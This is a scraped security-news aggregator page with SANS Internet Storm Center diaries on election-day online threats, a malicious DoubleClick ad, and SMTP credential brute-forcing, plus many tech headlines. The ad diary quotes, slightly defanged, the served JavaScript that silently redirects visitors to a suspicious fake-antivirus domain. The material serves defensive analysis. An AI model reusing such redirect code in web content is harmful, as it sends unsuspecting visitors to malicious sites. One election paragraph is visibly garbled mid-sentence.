Hackin9

InfoSec News


Today (Tuesday) is election day in the US. Many voters have already cast their ballot via absantee and early voting, but the vast majority will vote today. Like any major event, this is likely going to be used and abused in some way online. Here are some of the network security related issues to watch out for:

Search Engine Poisoning

This is an issue we have certainly seen less off this year. Search engines appear to get a better handle at poisoning of common search terms by black hat SEO operations. But it doenst mean it isnt happening, and this is an event with a long lead time so it is possible that we see something new and different.

Social Media Links

Facebook as been pretty crowded lately with statements supporting various candidates. So far, I havent seen this used maliciously, but it is an obvious easy target to introduce a link to a malicious version of a popular video clip. Of course fake late breaking news could be used to sway some last minute decisions, but it is likely too late for that.

DDoS Attacks

This year, we have seen plenty of politically motivated DDoS attacks. It would be no surprise, to see more of that tomorrow. On the other hand, large news sites will see record viewer numbers, and likely very dynamic frequently updated content. This will make them even more vulnerable to a DDoS attack, or it may be hard to figure out if a site is down or slow due to a DDoS attack or just normal-) ). Dont spread/re-tweet rumors. Also, the late breaking scandal may use twitter. See the social media comment above.



Polling Place Locations

Refer to official guides, and official websites to find out where to vote. Polling places can change from election to election and you may be standing in line only to be told that you are in the wrong location. So far, this has not been abused but misinformation has been spread via outdated inofficial sites.

Summary

only use official information from the original official source. If at all possible, use printed material like sample ballots that you received in the mail (not that they are always right), and refer to URLs that you have bookmarked in the past. There have been some news reports that areas affected by hurricane Sandy will allow for special voting arrengements like e-mail. Please confrim with an official source before e-mailing or faxing your vote. I will try and collect some of these sources here later.

Anything I forgot? (of course: go and vote if you are ellibible to do so).

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Cellular coverage for some carriers approached normal levels in the northeastern U.S. a week after Hurricane Sandy made landfall, but some areas remained cut off from mobile service because of ongoing power and telecommunications outages.
 
The Asia Pacific market has become a pressure cooker. A jolt in the regional economy is straining current IT infrastructures. Increasing workloads and incessant demands any time and from anywhere are seeing many traditional infrastructure creaking under pressure.
 
Corn.
 

Reader James ran into a Fake AV ad delivered by Double click. It is not clear if this is the result of a compromise of double click, or a paid ad that slipped through doubleclicks content review process. James started out at a local new paper web site, that like many others features ads served by double click. Luckily, James used a proxy tool (Fiddler) to record the session. Here are some of the excerpts (slightly anonymized and spaces inserted to avoid accidental clicks):

GET [...]

Accept-Encoding: gzip, deflate

Host: ad.doubleclick.net

Connection: Keep-Alive

Cookie: id=xxxxa||t=1352150000|et=730|cs=yyyy

The reply to this request was:

HTTP/1.1 200 OK

Server: DCLK-AdSvr

Content-Type: application/x-javascript

Content-Length: 167

Date: Mon, 05 Nov 2012 22:32:59 GMT



document.write(script type=\text/javascript\ language=\javascript\

src=\http://inc cam paign.com/jsb.php?id=29585w=bt=ju=13\\/scriptdocument.write(



This is typical doubleclick. The add returns a reference to some javascript. At this point, this isnt quite suspicious yet. But lets see what we get back from inccampaign.com:



if we access the site with wget (but fake the user agent), we get back:



http://inc cam paign.com/pr/b/29585.jpg . This is a harmless image, advertising luxury watches (these days of course, a luxury watch ad suggests a link to spamming).



James on the other hand got the following content back (I wasnt able to reproduce this):



document.write(a href=http://pw brand.com target=_blank

img src=http://inccampaign.com/pr/b/29585.jpg style=border:none //a

var url = http:+//fav+ozek.+info/+in.ph+p?q=8+/CEg1+rjwdE+mPDwt+BLw6u+Sk36++lyOya+TxYF9+UkLXx+A==

if (window != top) { top.location.replace(url) } else { window.location.replace(url) }



The content starts very similar, but his copy included additional javascript, forwarding the user to fav ozek.info . The domain is somewhat new (October 12 2012) and registered with Privacyprotect.org. Right now, none of the domains is listed as malicious in virustotal.



Still digging deeper into this, but right now, this looks at least suspicious. Let me know if you see similar issues with double click ads.



------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Multiple Symantec Products CAB Files Handling Memory Corruption Vulnerability
 
YUI 'SWF' File Unspecified Security Vulnerability
 
For the past three years, Nils Puhlmann was head of security for Zynga, the social games company that created mega-hits Farmville and Words With Friends.
 
AT&T will sell two Samsung tablets starting Friday: the Galaxy Tab 2 10.1 for $499.99 and the ATIV Smart PC for $799.99.
 
The co-chairman of the Ohio Green Party and editor of FreePress.org, Bob Fitrakis, on Monday filed a federal lawsuit over software that was allegedly installed on central vote tabulation machines in 39 Ohio counties without being tested or certified for use as required by state law.
 
Reader Walt Bischoff and his spouse--like all good couples--would like to share more of their lives with one another. He writes:
 
 

Our reader (and podcast listener) Pete wrote in with a little SMTP log snippet:

2012-11-04 22:37:36 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)

2012-11-04 22:37:36 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)

2012-11-04 22:37:37 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)

2012-11-04 22:37:37 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)

2012-11-04 22:37:38 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)

In this case, the attacker is 2.139.216.153. According to our DShield data, the host has a history of port 25 scanning, and evidently, participates in these brute force attacks once it finds port 25 open. (see https://isc.sans.edu/ipdetails.html?ip=2.139.216.153 ).

But this is just one of many IPs that Pete sees coming into his network. They all use 192.168.2.33 as hostname, which appears to be hard coded into the bot used to produce these scans.

Typically, these scans try to brute force SMTP credentials (not POP/IMAP credentials) to send spam via your users e-mail accounts. A few tips to help mitigate these attacks:


enable rate limits for inbound authentication attempts. This will at least slow down the attack. (consult your mail servers manual for details. Each server is different)

enable reasonable rate limits for outbound email. This way, it is easier to detect compromised accounts, and the account is of less value to the spammer

do not rely on passwords. Use SSL client certificates (or at least enforce a strong password policy)

only allow connections to send mail from inside your network, or via a VPN.


Any other ideas? FWIW: I do not recommend strict lock out policies for mail servers. They can make it impossible to change your SMTP password. Many users will use multiple devices these days, and if you for example lock an account after 3 bad logins, a user changing a password will be locked out as the users cell phone / tablet will continue to use the old password until it is changed. If you do implement lock out, then please communicate this to your users and ask them to first turn off all devices (that can be challenging as they may not even remember which devices they have) and then change their password.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
The co-chairman of the Ohio Green Party and editor of FreePress.org, Bob Fitrakis, on Monday filed a federal lawsuit over software that was allegedly installed on central vote tabulation machines in 39 Ohio counties without being tested or certified for use as required by state law.
 
A highly anticipated patent infringement case between Apple and Motorola Mobility was dismissed by a federal court Monday, hours before the trial was due to begin.
 
Some firms struggled while others smoothly executed disaster procedures. Experts said cloud computing aided data center resiliency.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
The new iPad Mini costs Apple just under $200 in materials and manufacturing, an analyst said today, putting an exclamation point on the company's devotion to high profit margins.
 
A highly anticipated patent infringement case between Apple and Motorola Mobility was dismissed by a Wisconsin district court Monday, hours before the trial was due to begin.
 
Microsoft CEO Steve Ballmer said Windows Phone will grow quickly in the global smartphone market.
 
Munin CVE-2012-3512 Insecure File Permissions Vulnerability
 
Munin Insecure Temporary File Creation Vulnerability
 
Mesa 'visit_field()' Method CVE-2012-2864 Remote Code Execution Vulnerability
 
Looking beyond PCs and tablets, Lenovo on Monday announced the first server from the newly formed Enterprise Product Group, which deals in servers, storage, networking and software.
 

Posted by InfoSec News on Nov 05

http://www.bloomberg.com/news/2012-11-04/coke-hacked-and-doesn-t-tell.html

By Ben Elgin, Dune Lawrence and Michael Riley
Bloomberg.com
Nov 4, 2012

FBI officials quietly approached executives at Coca-Cola Co. (KO) on
March 15, 2009, with some startling news.

Hackers had broken into the company’s computer systems and were
pilfering sensitive files about its attempted $2.4 billion acquisition
of China Huiyuan Juice Group (1886), according to...
 

Posted by InfoSec News on Nov 05

http://arstechnica.com/tech-policy/2012/11/how-georgia-doxed-a-russian-hacker-and-why-it-matters/

By Nate Anderson
Ars Technica
Nov 2, 2012

On October 24, the country of Georgia took an unusual step: it posted to
the Web a 27-page writeup (PDF), in English, on how it has been under
assault from a hacker allegedly based in Russia. The paper included
details of the malware used, how it spread, and how it was controlled.
Even more unusually,...
 

Posted by InfoSec News on Nov 05

http://www.startribune.com/local/blogs/176986441.html

By Eric Roper
StarTribune.com
November 2, 2012

A former cop who sued a number of Minnesota cities for breaches of her
drivers license data has now garnered more than $1 million in
settlements, following Minneapolis' approval of a $392,500 payout
Friday.

The City Council approved the settlement related to Anne Rasmusson's
lawsuit following their meeting Friday morning. It comes...
 

Posted by InfoSec News on Nov 05

Forwarded from: Conference <conference (at) sba-research.org>

Dear all,

I would like to invite you to submit a paper to the Information
Communication Technology-Eurasia Conference (ICT-EurAsia 2013) which
will take place in Yogyakarta (Indonesia) 25th-29th March 2013.

http://www.ifs.tuwien.ac.at/ict-eurasia/

The conference is supported by ASEA-Uninet (ASEAN-European University
Network), EPU (Eurasian Pacific University...
 
Samsung's Galaxy S III smartphone hit the 30 million sales mark in the five months since it became available, according to a Samsung blog post today.
 
Microsoft is updating its C++ compiler for its Visual Studio 12 IDE so that Windows application developers can use parts of the latest version of the programming language, C++11.
 
Brocade has announced its acquisition of Vyatta, a privately held maker of open source-based network software, for an undisclosed amount of cash.
 

Posted by InfoSec News on Nov 05

http://www.federalnewsradio.com/534/3103270/Delayed-software-updates-leave-IRS-computers-prone-to-hackers

By Jack Moore
FederalNewsRadio.com
11/1/2012

Thousands of IRS computers could be prone to cyber intruders because
officials aren't updating software in a timely manner, according to a
report from the Treasury Inspector General for Tax Administration.

Because hackers often exploit glitches in existing software to gain
access to...
 
Public dumps of ImageShack and Symantec sites, ESX kernel source code published, a number of sites defacements and DDoS attacks: they all appear to be taking place on the day Anonymous hacktivists called for action


 
Cyber criminals are currently sending malicious email messages en masse that claim to be from Vodafone and contain an MMS picture message from one of its users


 
Oracle MySQL Server CVE-2012-3163 Remote MySQL Security Vulnerability
 
Oracle MySQL Server CVE-2012-3173 Remote MySQL Security Vulnerability
 
[CVE-2012-5777]EmpireCMS Template Parser Remote PHP Code Execution Vulnerability
 
Researchers at the University of South Carolina have discovered that some types of electricity meter are broadcasting unencrypted information that, with the right software, would enable eavesdroppers to determine whether you're at home.
 
Workday on Monday unveiled a new set of enhancements to its cloud-based ERP software aimed at winning business from large multinational companies.
 
Intel's new enterprise-class SSD raises the bar over its predecessor in almost every metric, from adding 15 times the write performance and twice the read performance to doubling the endurance.
 
The European Commission passed a new rule that will force European Union member states to open up the 2 GHz band for 4G technologies.
 
Different hacker groups claim to have breached servers belonging to ImageShack, Symantec, PayPal and other organizations.
 
Apple today said it sold 3 million iPad tablets during the opening three-day weekend of sales of the Mini, the same number it boasted it had dealt out in March for the then-new full-sized iPad.
 
Colt's new data-center architecture is designed to allow operators more flexibility in managing power and cooling, without having to do extensive remodelling, the company said Monday.
 
When we tested mobile device management (MDM) last year, the products were largely focused on asset management - provisioning, protecting and containing mobile devices. Insider (registration required)
 
Cyber criminals are currently sending malicious email messages en masse that claim to be from Vodafone and contain an MMS picture message from one of its users


 
VideoLAN VLC Media Player <= 2.0.4 Crash Bug
 
XSS in answer my question plugin
 
Vulnerable MSVC++ 2008 runtime libraries distributed with and installed by eM client
 
Drupal Custom Publishing Options HTML Injection Vulnerability
 
Drupal Announcements Module Access Bypass Vulnerability
 
[SECURITY] [DSA 2572-1] iceape security update
 
[SECURITY] [DSA 2571-1] libproxy security update
 
We had the opportunity to go hands-on with the Nokia Lumia 920 before the device was officially unveiled in Australia last week
 
Premier 100 IT Leader Chris Miller also answers questions on long-term unemployment and coping with a woefully understaffed IT department.
 
 
ManageEngine Support Center Plus Multiple Security Vulnerabilities
 
[ MDVSA-2012:170 ] firefox
 
When an infection can result from just calling up a mainstream website, malware becomes harder to battle.
 
NetApp today announced significant upgrades to two of its midrange Fabric Attached Storage arrays, boosting memory, processor cores and drive slots.
 
Products from Avira are not compatible with Windows 8 – upgrading from Windows 7 to version 8 with Avira installed will result in an error screen. The only way to solve the problem is to manually uninstall the software


 
Drupal Monthly Archive by Node Type Module Access Bypass Vulnerability
 
Drupal Gallery Formatter Module Unspecified HTML Injection Vulnerability
 
Ubercart SecureTrading Payment Method Drupal Module Security Bypass Vulnerability
 
Hewlett-Packard has agreed to transfer 3,000 of its employees to the General Motors payroll, as the automaker moves IT operations in-house
 
Having finally launched its next-generation operating system, Windows 8, Microsoft now faces what may be its most daunting marketing challenge ever.
 
The economic picture that Gartner's head of research painted at his firm's recent Symposium/ITxpo conference was upbeat in a surprising way.
 
We in IT have a decision to make: Do we want to be powerful, or do we want to be influential?
 
It might help to do the unexpected at your next job interview.
 
One in four Macs now run OS X Mountain Lion, Apple's newest operating system, data released last week showed.
 
Tools vendors like greater capabilities SDK brings to smartphone apps, even if new PCs are needed to test code
 
From Tor to steganography, these six techniques will help obscure the data and traces you leave online
 
Apple's new iPad Mini delivers a full-fledged iPad experience in a smaller package, making it an ideal option for those who have been wanting a more diminutive Apple tablet, says Michael deAgonia.
 
The data center infrastructure at DreamWorks Imagination Studios is certainly state of the art, but it doesn't make as much use of cloud, virtualization solid-state storage technologies as one might expect. Insider (registration required)
 
 
The law enforcement agency is currently looking to recruit two people to work on trojans that intercept VoIP calls at the source. The job is based at its head office in Cologne


 
libproxy CVE-2012-4505 Heap-Based Buffer Overflow Vulnerability
 
BigAnt IM Server 'USV' Request Buffer Overflow Vulnerability
 
Internet Storm Center Infocon Status